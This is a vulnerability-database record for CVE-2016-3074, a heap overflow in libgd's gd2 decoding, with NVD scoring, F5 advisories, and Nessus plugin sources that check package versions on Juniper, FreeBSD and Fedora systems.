{"cve": [{"lastseen": "2020-10-03T12:10:44", "description": "Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based buffer overflow.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-26T14:59:00", "title": "CVE-2016-3074", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3074"], "modified": "2018-10-09T19:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:libgd:libgd:2.1.1", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2016-3074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3074", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:libgd:libgd:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:33", "bulletinFamily": "software", "cvelist": ["CVE-2016-3074"], "edition": 1, "description": "\nF5 Product Development 
has assigned ID 596111 (BIG-IQ) and ID 596113 (Enterprise Manager), and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H34958244 on the **Diagnostics** > **Identified** > **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Low| PHP \nFirePass| None| 
7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP \nBIG-IQ ADC| 4.5.0| None| Low| PHP \nBIG-IQ Centralized Management| 4.6.0| None| Low| PHP \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| PHP \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. 
The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-05T00:46:00", "published": "2016-06-01T02:37:00", "href": "https://support.f5.com/csp/article/K34958244", "id": "F5:K34958244", "title": "PHP vulnerability CVE-2016-3074", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:24", "bulletinFamily": "software", "cvelist": ["CVE-2016-3074"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. 
The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-05-31T00:00:00", "published": "2016-05-31T00:00:00", "id": "SOL34958244", "href": "http://support.f5.com/kb/en-us/solutions/public/k/34/sol34958244.html", "type": "f5", "title": "SOL34958244 - PHP vulnerability CVE-2016-3074", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T03:19:29", "description": "According to its self-reported version number, the remote Juniper\nJunos device is affected by an integer signedness error in the\nincluded GD Graphics Library (libgd) when handling compressed GD2 data\ndue to improper validation of user-supplied input. 
An unauthenticated,\nremote attacker can exploit this, via specially crafted compressed GD2\ndata, to cause a heap-based buffer overflow, resulting in a denial of\nservice condition or the execution of arbitrary code.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "title": "Juniper Junos libgd Compressed GD2 Data RCE (JSA10798)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA10798.NASL", "href": "https://www.tenable.com/plugins/nessus/102073", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102073);\n script_version (\"1.4\");\n script_cvs_date(\"Date: 2018/07/13 15:08:46\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_bugtraq_id(87087);\n script_xref(name:\"JSA\", value:\"JSA10798\");\n script_xref(name:\"EDB-ID\", value:\"39736\");\n\n script_name(english:\"Juniper Junos libgd Compressed GD2 Data RCE (JSA10798)\");\n script_summary(english:\"Checks the Junos version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Juniper\nJunos device is affected by an integer signedness error in the\nincluded GD Graphics Library (libgd) when handling compressed GD2 data\ndue to improper validation of user-supplied input. 
An unauthenticated,\nremote attacker can exploit this, via specially crafted compressed GD2\ndata, to cause a heap-based buffer overflow, resulting in a denial of\nservice condition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10798\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant Junos software release referenced in Juniper\nsecurity advisory JSA10798.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos_kb_cmd_func.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\n\nfixes = make_array();\n\nfixes['12.1X46'] = '12.1X46-D65';\nfixes['12.3X48'] = '12.3X48-D40';\nfixes['14.2'] = '14.2R8';\nfixes['15.1'] = '15.1R5';\nfixes['15.1X49'] = 
'15.1X49-D70';\nfixes['15.1X53'] = '15.1X53-D47';\nfixes['16.1'] = '16.1R4';\nfixes['16.2'] = '16.2R2';\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\njunos_report(ver:ver, fix:fix, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:51:34", "description": "The PHP Group reports :\n\n- BCMath :\n\n- Fixed bug #72093 (bcpowmod accepts negative scale and corrupts _one_\ndefinition).\n\n- Exif :\n\n- Fixed bug #72094 (Out of bounds heap read access in exif header\nprocessing).\n\n- GD :\n\n- Fixed bug #71912 (libgd: signedness vulnerability). (CVE-2016-3074)\n\n- Intl :\n\n- Fixed bug #72061 (Out-of-bounds reads in zif_grapheme_stripos with\nnegative offset).\n\n- XML :\n\n- Fixed bug #72099 (xml_parse_into_struct segmentation fault).", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-03T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (5764c634-10d2-11e6-94fa-002590263bf5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-03T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php55-gd", "p-cpe:/a:freebsd:freebsd:php56-bcmath", "p-cpe:/a:freebsd:freebsd:php70", "p-cpe:/a:freebsd:freebsd:php55-xml", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php70-exif", "p-cpe:/a:freebsd:freebsd:php56-gd", "p-cpe:/a:freebsd:freebsd:php70-bcmath", "p-cpe:/a:freebsd:freebsd:php70-xml", "p-cpe:/a:freebsd:freebsd:php70-gd", "p-cpe:/a:freebsd:freebsd:php56-xml", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php56", "p-cpe:/a:freebsd:freebsd:php55-bcmath", "p-cpe:/a:freebsd:freebsd:php55-exif", "p-cpe:/a:freebsd:freebsd:php56-exif"], "id": "FREEBSD_PKG_5764C63410D211E694FA002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/90844", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 
checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90844);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3074\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (5764c634-10d2-11e6-94fa-002590263bf5)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP Group reports :\n\n- BCMath :\n\n- Fixed bug #72093 (bcpowmod accepts negative scale and corrupts _one_\ndefinition).\n\n- Exif :\n\n- Fixed bug #72094 (Out of bounds heap read access in exif header\nprocessing).\n\n- GD :\n\n- Fixed bug #71912 (libgd: signedness vulnerability). 
(CVE-2016-3074)\n\n- Intl :\n\n- Fixed bug #72061 (Out-of-bounds reads in zif_grapheme_stripos with\nnegative offset).\n\n- XML :\n\n- Fixed bug #72099 (xml_parse_into_struct segmentation fault).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-7.php#7.0.6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.6.21\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.5.35\"\n );\n # https://vuxml.freebsd.org/freebsd/5764c634-10d2-11e6-94fa-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47b75d01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php70<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-bcmath<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-exif<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-gd<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-xml<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-bcmath<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-exif<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-gd<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-xml<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-bcmath<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-exif<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-gd<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-xml<5.5.35\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:18", "description": "Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription 
block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-02T00:00:00", "title": "Fedora 23 : gd-2.1.1-5.fc23 (2016-5f91f43826)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gd", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-5F91F43826.NASL", "href": "https://www.tenable.com/plugins/nessus/90812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-5f91f43826.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90812);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"FEDORA\", value:\"2016-5f91f43826\");\n\n script_name(english:\"Fedora 23 : gd-2.1.1-5.fc23 (2016-5f91f43826)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1321893\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183263.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?365d1eeb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"gd-2.1.1-5.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:13:59", "description": "Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "Fedora 24 : gd-2.1.1-7.fc24 (2016-0c57b12c7b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gd", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-0C57B12C7B.NASL", "href": "https://www.tenable.com/plugins/nessus/90948", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-0c57b12c7b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90948);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"FEDORA\", value:\"2016-0c57b12c7b\");\n\n script_name(english:\"Fedora 24 : gd-2.1.1-7.fc24 (2016-0c57b12c7b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
